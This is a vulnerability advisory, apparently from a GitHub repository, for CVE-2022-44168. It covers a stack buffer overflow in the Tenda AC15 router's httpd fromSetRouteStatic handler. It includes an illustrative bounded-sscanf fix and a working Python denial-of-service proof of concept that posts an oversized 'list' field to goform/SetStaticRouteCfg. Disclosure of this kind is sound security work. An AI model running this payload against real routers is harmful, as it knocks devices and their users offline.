Headline
CVE-2022-44168: IoT_vuln/Tenda/AC15/fromSetRouteStatic at main · RobinWang825/IoT_vuln
Tenda AC15 V15.03.05.18 is vulnerable to Buffer Overflow via function fromSetRouteStatic…
Tenda AC15(V15.03.05.18) has a Buffer Overflow Vulnerability
Product
- product information: https://www.tenda.com.cn/
- firmware download: https://www.tenda.com.cn/download/detail-2710.html
Affected version
V15.03.05.18
Vulnerability
The stack overflow vulnerability is in /bin/httpd. The vulnerability occurs in the fromSetRouteStatic function, which can be accessed through the URL goform/SetStaticRouteCfg.
In fromSetRouteStatic, the content the program obtains from the parameter list is stored in v5, and v5 is then passed to the sub_78530 function as the second argument.
In sub_78530, sscanf is called to split this value and copy it to a stack buffer without checking its length.
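The fix for this class of bug is to give every sscanf conversion an explicit field width and reject input that does not fit. The following is an added example, not code from the firmware or the original advisory; the format string, the 15-byte limit, the field names and parse_route_entry are assumptions for illustration.

```c
#include <stdio.h>
#include <string.h>

#define FIELD_MAX 15            /* assumed limit: longest dotted-quad IPv4 string */
#define STR_(x) #x
#define STR(x) STR_(x)
#define W "%" STR(FIELD_MAX) "[^,]"   /* width-bounded scanset: at most FIELD_MAX bytes */

/* Hypothetical record; the four field meanings are assumed, not taken from the firmware. */
struct route_entry {
    char dest[FIELD_MAX + 1];
    char mask[FIELD_MAX + 1];
    char gateway[FIELD_MAX + 1];
    char iface[FIELD_MAX + 1];
};

/*
 * Unbounded pattern of the kind the advisory describes (format string assumed):
 *     sscanf(item, "%[^,],%[^,],%[^,],%s", dest, mask, gateway, iface);
 * Each conversion copies until the next delimiter, whatever the destination size.
 *
 * Bounded version: returns 0 on success, -1 if the entry is malformed
 * or any field is longer than FIELD_MAX.
 */
int parse_route_entry(const char *item, struct route_entry *out)
{
    int consumed = 0;

    memset(out, 0, sizeof(*out));
    int n = sscanf(item, W "," W "," W "," W "%n",
                   out->dest, out->mask, out->gateway, out->iface, &consumed);
    if (n != 4)
        return -1;              /* missing field, or an overlong field broke the ',' match */
    if (item[consumed] != '\0')
        return -1;              /* trailing bytes: last field exceeded FIELD_MAX */
    return 0;
}

int main(void)
{
    struct route_entry r;
    char oversized[0x400 + 8];  /* constructed input: 0x400-byte first field */

    memset(oversized, 'A', 0x400);
    strcpy(oversized + 0x400, ",A,A,A");
    printf("valid:     %d\n", parse_route_entry("192.168.10.0,255.255.255.0,192.168.0.1,br0", &r));
    printf("oversized: %d\n", parse_route_entry(oversized, &r));
    return 0;
}
```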
PoC
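PoC of Denial of Service (DoS)
```python
import requests

# "list" carries a 0x400-byte first field followed by three short comma-separated fields
data = {
    b"list": b'A'*0x400+b',A,A,A'
}
res = requests.post("http://192.168.0.1/goform/SetStaticRouteCfg", data=data)
print(res.content)
```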